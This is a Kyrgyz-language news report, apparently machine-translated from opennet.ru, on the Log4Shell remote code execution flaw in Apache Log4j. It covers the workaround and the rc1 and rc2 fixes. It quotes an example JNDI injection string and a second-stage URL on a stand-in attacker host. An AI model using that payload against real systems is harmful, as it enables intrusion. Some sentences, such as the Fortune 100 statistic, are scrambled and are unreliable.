Apache Log4j, Java тиркемелеринде каттоону уюштуруу үчүн популярдуу алкактарда журналга “{jndi:URL}” форматында атайын форматталган маани жазылганда каалаган кодду аткарууга мүмкүндүк берген олуттуу кемчилик аныкталган. Кол салуу тышкы булактардан алынган маанилерди журналга алган Java тиркемелеринде, мисалы, ката билдирүүлөрүндө көйгөйлүү маанилерди көрсөтүүдө жүргүзүлүшү мүмкүн.
Белгилей кетсек, Apache Struts, Apache Solr, Apache Druid же Apache Flink сыяктуу алкактарды колдонгон дээрлик бардык долбоорлор Steam, Apple iCloud, Minecraft кардарлары жана серверлери менен байланышкан. Алсыздык корпоративдик тиркемелерге массалык чабуулдардын толкунуна алып келиши мүмкүн деп күтүлүүдө, Apache Struts алкагындагы критикалык алсыздыктар тарыхын кайталап, болжолдуу баа боюнча, Fortune 65% веб-тиркемелерде колдонулат. 100 компания, анын ичинде тармакта аялуу системаларды издөө аракеттери.
Жумушчу эксплуатация буга чейин жарыяланган, бирок туруктуу бутактар үчүн оңдоолор али түзүлө электиги көйгөйдү курчутат. CVE идентификатору азырынча дайындала элек. Оңдоо log4j-2.15.0-rc1 сыноо тармагына гана киргизилген. Алсыздыкты бөгөттөө үчүн убактылуу чечим катары log4j2.formatMsgNoLookups параметрин чындыкка коюу сунушталат.
Маселе log4j'нин лог саптарындагы атайын маскаларды "{}" иштетүүнү колдогондугунан келип чыккан, аларды JNDI (Java Naming and Directory Interface) суроо-талаптарын аткаруу үчүн колдонсо болот. Чабуул "${jndi:ldap://attacker.com/a}" алмаштыруусу бар сапты өткөрүүгө келип такалат, ал иштетилгенде log4j жөнөтөт Server Java классынын жолу үчүн attacker.com LDAP суроосу. Кайтарылды сервер Чабуулчунун жолу (мисалы, http://second-stage.attacker.com/Exploit.class) учурдагы процесстин контекстинде жүктөлөт жана аткарылат, бул чабуулчуга учурдагы тиркеменин артыкчылыктары менен системада каалагандай кодду аткарууга мүмкүндүк берет.
1-тиркеме: Абалына CVE-2021-44228 идентификатору ыйгарылган.
2-тиркеме: log4j-2.15.0-rc1 релизинин жардамы менен кошулган коргоону айланып өтүү жолу аныкталган. Жаңы жаңыртуу, log4j-2.15.0-rc2, алсыздыктан толук коргоосу менен сунушталды. Код туура эмес форматталган JNDI URL дарегин колдонгон учурда анормалдуу токтотуунун жоктугу менен байланышкан өзгөрүүнү баса белгилейт.
Source: opennet.ru
